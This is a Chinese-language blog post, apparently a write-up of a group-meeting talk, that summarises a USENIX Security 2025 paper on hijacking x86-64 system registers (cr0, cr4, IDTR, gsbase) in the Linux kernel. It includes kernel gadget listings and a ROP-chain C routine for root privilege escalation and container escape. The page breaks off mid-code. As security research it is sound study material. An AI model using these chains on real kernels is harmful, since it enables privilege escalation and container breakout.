<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="写在最前面最近在组会上进行了一次论文分享，考虑到以后博客上也不会再更新什么 CTF 相关的内容了，要开始慢慢的进行内容转型了，所以打算把当时组会分享的内容更新到博客上:)  这篇博客的语言风格将以我当时组会汇报时的风格进行编写，可能和之前的博客语言风格有较大的区别  System Register Hijacking组会汇报时用的PPT：https:&#x2F;&#x2F;github.com&#x2F;Qanux&#x2F;paper">
<meta property="og:type" content="article">
<meta property="og:title" content="论文分享: System Register Hijacking">
<meta property="og:url" content="https://qanux.github.io/2025/11/07/srh/index.html">
<meta property="og:site_name" content="Qanux&#39;s space">
<meta property="og:description" content="写在最前面最近在组会上进行了一次论文分享，考虑到以后博客上也不会再更新什么 CTF 相关的内容了，要开始慢慢的进行内容转型了，所以打算把当时组会分享的内容更新到博客上:)  这篇博客的语言风格将以我当时组会汇报时的风格进行编写，可能和之前的博客语言风格有较大的区别  System Register Hijacking组会汇报时用的PPT：https:&#x2F;&#x2F;github.com&#x2F;Qanux&#x2F;paper">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/1.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/2.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/3.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/4.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/5.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/6.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/7.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/8.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/9.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/10.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/11.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/12.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/13.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/14.png">
<meta property="og:image" content="https://qanux.github.io/2025/11/07/srh/15.png">
<meta property="article:published_time" content="2025-11-06T16:00:00.000Z">
<meta property="article:modified_time" content="2025-11-07T09:20:44.894Z">
<meta property="article:author" content="Qanux">
<meta property="article:tag" content="CsomePro">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://qanux.github.io/2025/11/07/srh/1.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.jpg">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon.jpg" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.jpg">
        
      
    
    <!-- title -->
    <title>论文分享: System Register Hijacking</title>
    <!-- async scripts -->
    <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?dfa426831961b1170306cf91cfce69b4";
      var s = document.getElementsByTagName("script")[0]; 
      s.parentNode.insertBefore(hm, s);
    })();
    </script>
    
    
    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.0.0"><link rel="alternate" href="/atom.xml" title="Qanux's space" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/friend/">Link</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/11/18/bbox/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/11/03/2025%E5%B0%8F%E7%90%90%E7%A2%8E/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://qanux.github.io/2025/11/07/srh/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://qanux.github.io/2025/11/07/srh/&text=论文分享: System Register Hijacking"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://qanux.github.io/2025/11/07/srh/&title=论文分享: System Register Hijacking"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://qanux.github.io/2025/11/07/srh/&is_video=false&description=论文分享: System Register Hijacking"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=论文分享: System Register Hijacking&body=Check out this article: https://qanux.github.io/2025/11/07/srh/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://qanux.github.io/2025/11/07/srh/&title=论文分享: System Register Hijacking"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://qanux.github.io/2025/11/07/srh/&title=论文分享: System Register Hijacking"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://qanux.github.io/2025/11/07/srh/&title=论文分享: System Register Hijacking"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://qanux.github.io/2025/11/07/srh/&title=论文分享: System Register Hijacking"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://qanux.github.io/2025/11/07/srh/&name=论文分享: System Register Hijacking&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://qanux.github.io/2025/11/07/srh/&t=论文分享: System Register Hijacking"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%99%E5%9C%A8%E6%9C%80%E5%89%8D%E9%9D%A2"><span class="toc-number">1.</span> <span class="toc-text">写在最前面</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#System-Register-Hijacking"><span class="toc-number">2.</span> <span class="toc-text">System Register Hijacking</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%99%E9%81%93%E6%9C%80%E5%90%8E"><span class="toc-number">3.</span> <span class="toc-text">写道最后</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#reference"><span class="toc-number">4.</span> <span class="toc-text">reference</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        论文分享: System Register Hijacking
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Qanux</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-11-06T16:00:00.000Z" class="dt-published" itemprop="datePublished">2025-11-07</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="写在最前面"><a href="#写在最前面" class="headerlink" title="写在最前面"></a>写在最前面</h2><p>最近在组会上进行了一次论文分享，考虑到以后博客上也不会再更新什么 CTF 相关的内容了，要开始慢慢的进行内容转型了，所以打算把当时组会分享的内容更新到博客上:) </p>
<p>这篇博客的语言风格将以我当时组会汇报时的风格进行编写，可能和之前的博客语言风格有较大的区别 </p>
<h2 id="System-Register-Hijacking"><a href="#System-Register-Hijacking" class="headerlink" title="System Register Hijacking"></a>System Register Hijacking</h2><p>组会汇报时用的PPT：<a target="_blank" rel="noopener" href="https://github.com/Qanux/paper-presentations/blob/main/20251106.pdf">https://github.com/Qanux/paper-presentations/blob/main/20251106.pdf</a>  </p>
<p>今天我要分享的这篇论文来自 usenix 2025，讲的是 linux kernel 上的系统寄存器劫持，论文名为 <strong>System Register Hijacking: Compromising Kernel Integrity By Turning System Registers Against the System</strong>，可以在如下链接来该找到论文的原文：<a target="_blank" rel="noopener" href="https://www.usenix.org/conference/usenixsecurity25/presentation/miller">System Register Hijacking</a>  </p>
<p>这篇论文是我几天前偶然刷到的，我觉得挺好玩所以就将原本打算分享的那篇论文临时更改为这篇。考虑到这篇论文可能有人读过以及尽可能的在较短时间内讲透这篇论文，我这里只会对这篇论文的重点部分进行分享。  </p>
<blockquote>
<p>Kernel hijacking<br>Hijacking control flow：rop、cop、jop、call&#x2F;jmp shellcode<br>Hijacking data streams：dirty pipe、dirty cred</p>
</blockquote>
<p>黑客攻击 linux kernel 最常见的两种方式是劫持程序控制流和劫持程序数据流，劫持控制流比较常见，比如 rop、cop 以及 call 恶意代码等等。而劫持数据流则多用于向只读文件中写入用户自定义的恶意数据。  </p>
<p>如图中 blackhat 的 ppt 就是通过 cve 修改 kernel 中的 file 结构体进而让普通用户可以越权向 passwd 文件中写入自己的数据。 </p>
<img src="/2025/11/07/srh/1.png" class="" title="我的图图呢">  

<p>而这篇论文中提出的系统寄存器劫持可以让劫持程序流更加简单。</p>
<p>传统内核攻击依赖通用寄存器，而内核存在系统寄存器直接控制 CPU 安全特性和关键数据如中断描述符表 IDT 和页表等等，下面列出了 cr0 和 cr4 寄存器所控制的一些安全特性。由此可见如果攻击者能过够劫持系统寄存器，就能够造成巨大的安全威胁。  </p>
<blockquote>
<p>CR0 相关特性<br>CR0.WP （写保护，bit 16）：当置位时，内核态对标记为只读的页也会被禁止写入。常用于保护页表、只读代码&#x2F;数据；<br>CR0.PG （分页启用，bit 31）：启用分页机制，是所有基于页的隔离&#x2F;权限（U&#x2F;S、 NX 等）的基础；<br>CR0.PE （保护模式启用，bit 0）：决定是否处于保护模式，现代系统始终开启；与安全隔离的基本前提相关。<br>CR0.AM （对齐掩码，bit 18，配合 EFLAGS.AC ）：启用对齐检查（主要对用户态有效），降低某些未对齐访问的未定义行为风险。</p>
</blockquote>
<blockquote>
<p>CR4 相关特性<br>CR4.SMEP （Supervisor Mode Execution Prevention，bit 20）：禁止内核态执行用户态页面中的代码（U&#x2F;S&#x3D;1），防止“内核跳到用户代码执行”的攻击路径。<br>CR4.SMAP （Supervisor Mode Access Prevention，bit 21）：禁止内核态直接读写用户态数据（U&#x2F;S&#x3D;1），除非暂时通过 stac &#x2F; clac 设置 EFLAGS.AC 允许访问；防止利用不安全的 copy 路径。<br>CR4.UMIP （User-Mode Instruction Prevention，bit 11）：限制用户态执行 SGDT&#x2F;SIDT&#x2F;SLDT&#x2F;SMSW&#x2F;STR 等指令获取系统信息，缓解信息泄露与 KASLR 绕过。<br>CR4.FSGSBASE （bit 16）：允许用户态执行 wrgsbase&#x2F;rdgsbase&#x2F;rdfsbase&#x2F;wrfsbase 。<br>CR4.PAE （bit 5）：启用物理地址扩展；在 32 位模式下要与 IA32_EFER.NXE 一起才能使用 NX （不可执行）位，实现数据执行保护（DEP）。<br>CR4.PKE （Protection Keys for Userspace，bit 22）：启用用户态内存保护键（PKU），配合 PKRU 在用户态细粒度地禁&#x2F;允读写执行，强化隔离策略。</p>
</blockquote>
<img src="/2025/11/07/srh/2.png" class="" title="我的图图呢">  

<blockquote>
<p>Table 1: Security-Sensitive System Register-modifying instructions identified on x86-64 and aarch64, which mitigations or structures they control, and the preconditions necessary (SC is Stack Control, RC is Register Control). Representative gadgets for each instruction where valid gadgets that are short enough to display were present are listed beneath the associated instruction. * Their iret, popf, stac, and clac instructions are able to modify the AC bit in the EFLAGS register, which controls the status of SMAP.</p>
</blockquote>
<p>论文的作者在 linux kernel 中找到非常多可以用于修改系统寄存器的 gadget，如上图表格所示，其中这些 gadget 包括 x86-64 和 aarch64 两种架构，这次论文分享则专注于 x86-64 这个结构。  </p>
<table>
<thead>
<tr>
<th>Architecture</th>
<th>Technique</th>
<th>Target Register</th>
<th>Prerequisites</th>
<th>Defense Bypassed</th>
</tr>
</thead>
<tbody><tr>
<td>x86-64</td>
<td>swapgs Stack Pivoting</td>
<td>GSBase</td>
<td>No register&#x2F;stack control</td>
<td>FineIBT&#x2F;kCFI</td>
</tr>
<tr>
<td>x86-64</td>
<td>popf Extension + RetSpill</td>
<td>EFLAGS.AC</td>
<td>Stack control</td>
<td>SMAP</td>
</tr>
<tr>
<td>x86-64</td>
<td>cr4 Hijacking</td>
<td>cr4</td>
<td>Register control</td>
<td>SMEP&#x2F;SMAP</td>
</tr>
<tr>
<td>x86-64</td>
<td>cr0 Hijacking</td>
<td>cr0</td>
<td>Register control</td>
<td>Write Protection (WP)</td>
</tr>
<tr>
<td>x86-64</td>
<td>IDT Hijacking</td>
<td>IDTR</td>
<td>Stack control</td>
<td>Exception Handling Mechanism</td>
</tr>
<tr>
<td>AArch64</td>
<td>PAN Hijacking</td>
<td>PAN MSR</td>
<td>Register control</td>
<td>PAN (Privileged Access Never)</td>
</tr>
<tr>
<td>AArch64</td>
<td>SPSR_EL1 Hijacking</td>
<td>SPSR_EL1</td>
<td>Stack control + Register control</td>
<td>PAN + Control Flow</td>
</tr>
</tbody></table>
<p>作者通过他找到的 gadget 提出了7种 linux kernel 基于劫持系统寄存器的攻击技术，主要分为两类劫持目标，一种是劫持特性控制寄存器去禁用一些安全机制进而让攻击者更好的进行漏洞的利用，另外一种则是劫持结构地址寄存器去控制一些非常重要的内核结构体进而去构造更加强大的利用原语。  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">virtual_mapped:</span><br><span class="line">  &lt;+35&gt;: mov cr0,rax</span><br><span class="line">  &lt;+38&gt;: mov rax,rbp</span><br><span class="line">  &lt;+41&gt;: popf</span><br><span class="line">  &lt;+42&gt;: pop r15</span><br><span class="line">  &lt;+44&gt;: pop r14</span><br><span class="line">  &lt;+46&gt;: pop r13</span><br><span class="line">  &lt;+48&gt;: pop r12</span><br><span class="line">  &lt;+50&gt;: pop rbp</span><br><span class="line">  &lt;+51&gt;: pop rbx</span><br><span class="line">  &lt;+52&gt;: ret</span><br><span class="line"></span><br><span class="line">sev_verify_cbit:</span><br><span class="line">  &lt;+69&gt;: mov cr4,rsi</span><br><span class="line">  &lt;+72&gt;: je sev_verify_cbit+87</span><br><span class="line">  &lt;+74&gt;: xor rsp,rsp</span><br><span class="line">  &lt;+77&gt;: sub rsp,0x1000</span><br><span class="line">  &lt;+84&gt;: hlt</span><br><span class="line">  &lt;+85&gt;: jmp sev_verify_cbit+84</span><br><span class="line">  &lt;+87&gt;: mov rax,rdi</span><br><span class="line">  &lt;+90&gt;: jmp __x86_return_thunk</span><br></pre></td></tr></table></figure>

<p>作者内核中找到了一些非常好用的 gadget 可以直接控制 cr0 和 cr4 这两个寄存器，如上面所示，攻击者可以利用这些 gadget 去修改 cr0 和 cr4 寄存器关闭一些保护机制进而降低 rop 链的编写难度，毕竟高版本的 kernel 比较好用的 gadget 非常少，通常为了控制一个通用寄存器需要多个 gadget 进行组合。  </p>
<p>同时作者也提出可以用 popf;ret 这个 gadget 来让 rop 变得更加容易。当用户态切换到内核态时，os 会将用户态的寄存器保存在 kernel 的栈上，这个结构被叫做 pt_regs，这个结构在早期的 kernel 版本中在栈中的偏移是固定的  </p>
<img src="/2025/11/07/srh/3.png" class="" title="我的图图呢">  

<p>攻击者在可以在用户态提前在这些通用寄存器上布置好 rop 链，然后在内核态劫持程序流时直接栈迁移到这个栈上的结构进行 rop。但是通用寄存器的数量是有限的，也就是说我们 rop 的长度是有限的，而当我们的目的不再是提权而是进行容器逃逸比如 docker 或者 nsjail 逃逸时，rop 的长度将会变得非常的长  </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">rop_chain</span><span class="params">(<span class="type">uint64_t</span>* data)</span>&#123;</span><br><span class="line">    <span class="type">int</span> i = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// nft_rule_blob.size &gt; 0</span></span><br><span class="line">    data[i++] = <span class="number">0x100</span>;</span><br><span class="line">    <span class="comment">// nft_rule_blob.dlen &gt; 0</span></span><br><span class="line">    data[i++] = <span class="number">0x100</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// fake ops addr</span></span><br><span class="line">    data[i++] = PAYLOAD_LOCATION(<span class="number">1</span>) + offsetof(<span class="keyword">struct</span> cpu_entry_area_payload, nft_expr_eval);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// current = find_task_by_vpid(getpid())</span></span><br><span class="line">    data[i++] = kbase + POP_RDI_RET;</span><br><span class="line">    data[i++] = getpid();</span><br><span class="line">    data[i++] = kbase + FIND_TASK_BY_VPID;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// current += offsetof(struct task_struct, rcu_read_lock_nesting)</span></span><br><span class="line">    data[i++] = kbase + POP_RSI_RET;</span><br><span class="line">    data[i++] = RCU_READ_LOCK_NESTING_OFF;</span><br><span class="line">    data[i++] = kbase + ADD_RAX_RSI_RET;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// current-&gt;rcu_read_lock_nesting = 0 (Bypass rcu protected section)</span></span><br><span class="line">    data[i++] = kbase + POP_RCX_RET;</span><br><span class="line">    data[i++] = <span class="number">0</span>;</span><br><span class="line">    data[i++] = kbase + MOV_RAX_RCX_RET;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Bypass &quot;schedule while atomic&quot;: set oops_in_progress = 1</span></span><br><span class="line">    data[i++] = kbase + POP_RDI_RET;</span><br><span class="line">    data[i++] = <span class="number">1</span>;</span><br><span class="line">    data[i++] = kbase + POP_RSI_RET;</span><br><span class="line">    data[i++] = kbase + OOPS_IN_PROGRESS;</span><br><span class="line">    data[i++] = kbase + MOV_RSI_RDI_RET;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// commit_creds(&amp;init_cred)</span></span><br><span class="line">    data[i++] = kbase + POP_RDI_RET;</span><br><span class="line">    data[i++] = kbase + INIT_CRED;</span><br><span class="line">    data[i++] = kbase + COMMIT_CREDS;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// find_task_by_vpid(1)</span></span><br><span class="line">    data[i++] = kbase + POP_RDI_RET;</span><br><span class="line">    data[i++] = <span class="number">1</span>;</span><br><span class="line">    data[i++] = kbase + FIND_TASK_BY_VPID;</span><br><span class="line"></span><br><span class="line">    data[i++] = kbase + POP_RSI_RET;</span><br><span class="line">    data[i++] = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// switch_task_namespaces(find_task_by_vpid(1), &amp;init_nsproxy)</span></span><br><span class="line">    data[i++] = kbase + MOV_RDI_RAX_RET;</span><br><span class="line">    data[i++] = kbase + POP_RSI_RET;</span><br><span class="line">    data[i++] = kbase + INIT_NSPROXY;</span><br><span class="line">    data[i++] = kbase + SWITCH_TASK_NAMESPACES;</span><br><span class="line"></span><br><span class="line">    data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;</span><br><span class="line">    data[i++] = <span class="number">0</span>;</span><br><span class="line">    data[i++] = <span class="number">0</span>;</span><br><span class="line">    data[i++] = _user_rip;</span><br><span class="line">    data[i++] = _user_cs;</span><br><span class="line">    data[i++] = _user_rflags;</span><br><span class="line">    data[i++] = _user_sp;</span><br><span class="line">    data[i++] = _user_ss;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>上面的这个 rop 就是用来 docker 和 nsjail 逃逸的 rop，非常的长，利用那几个通用寄存器完全不足以用来布置这么长的 rop  </p>
<p>作者提出这个时候就可以使用这个 popf;ret 妙妙小 gadget 了。攻击者可以现在用户态布置好较长的 rop 链，然后在 kernel 执行 rop 时使⽤  popf; ret 这个 gadget 暂时禁⽤ SMAP 检查来然后栈迁移至⽤⼾内存中的更⻓ rop 链，这将会大大的减短内核态中 rop 的长度。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">u64 chain[<span class="number">4</span>];</span><br><span class="line">chain[<span class="number">0</span>] = popf_ret;</span><br><span class="line">chain[<span class="number">1</span>] = eflags;</span><br><span class="line">chain[<span class="number">2</span>] = pop_rsp_ret;</span><br><span class="line">chain[<span class="number">3</span>] = (u64)full_chain_usr;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">retspill_req</span> &#123;</span></span><br><span class="line">    <span class="type">char</span> *buf;</span><br><span class="line">    <span class="type">void</span> *target;</span><br><span class="line">&#125; req;</span><br><span class="line"></span><br><span class="line">req.buf = (<span class="type">char</span> *)chain;</span><br><span class="line">req.target = (<span class="type">void</span> *)pop_rdi_ret;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">case 1342:</span></span><br><span class="line"><span class="comment">    struct retspill_req &#123;</span></span><br><span class="line"><span class="comment">        __user char *buf;</span></span><br><span class="line"><span class="comment">        __user void *dst;</span></span><br><span class="line"><span class="comment">    &#125;;</span></span><br><span class="line"><span class="comment">    char buf[0x20] = &#123;0&#125;;</span></span><br><span class="line"><span class="comment">    char *buf_ptr = 0;</span></span><br><span class="line"><span class="comment">    void *dst = 0;</span></span><br><span class="line"><span class="comment">    get_user(buf_ptr, &amp;((struct retspill_req *)arg)-&gt;buf);</span></span><br><span class="line"><span class="comment">    get_user(dst, &amp;((struct retspill_req *)arg)-&gt;dst);</span></span><br><span class="line"><span class="comment">    copy_from_user(buf, buf_ptr, sizeof(buf));</span></span><br><span class="line"><span class="comment">    asm volatile (</span></span><br><span class="line"><span class="comment">        &quot;.intel_syntax noprefix;&quot;</span></span><br><span class="line"><span class="comment">        &quot;call %0;&quot;</span></span><br><span class="line"><span class="comment">        &quot;.att_syntax prefix;&quot;</span></span><br><span class="line"><span class="comment">        : : &quot;r&quot; (dst) :</span></span><br><span class="line"><span class="comment">    );</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">ioctl(dbg, <span class="number">1342</span>, &amp;req);</span><br></pre></td></tr></table></figure>

<p>如上面所示，攻击者只需通过 0x20 字节的内核 rop 链即可将内核的栈栈迁移至用户态进而执行提前在用户态布置好的更长的 rop。</p>
<img src="/2025/11/07/srh/4.png" class="" title="我的图图呢">  

<p>早期对 linux kernel 中断向量的攻击是直接去修改中断向量的指针，而现在的 linux kernel 已经将这块区域设置为只读。作者发现 kernel 中存在一个叫 lidt 的 gadget 可以直接修改 IDTR.base 到一块攻击者可用的内存上，进而让每次中断&#x2F;异常的“门描述符”都由攻击者提供，变相的让攻击者的获得任意地址 call 的利用原语。  </p>
<img src="/2025/11/07/srh/5.png" class="" title="我的图图呢">  
<p>然后这是这篇论文最精彩的部分，就是通过劫持 gsbase 来进行栈迁移。linux 中存在两个 gsbase 分别指向两个 gs 结构，一个在用户态，一个在内核态。在新版本的 linux kernel 中支持 wrgsbase 指令让用户可以设置用户态的 gsbase。gs 结构里面存放着 rsp 等重要信息。当用户态通过系统调用 syscall 进入到内核时，会先调用 swapgs 来进行用户态和内核态的 gsbase 的交换，然后从内核 gsbase 中取出内核栈的地址赋值给 rsp 寄存器。作者提出如果我们能够合理利用这个特性，就能够实现栈迁移。  </p>
<p>当我们获得 kernel 任意地址 call 时，利用过程大致如下：  </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">   <span class="comment">// Store our 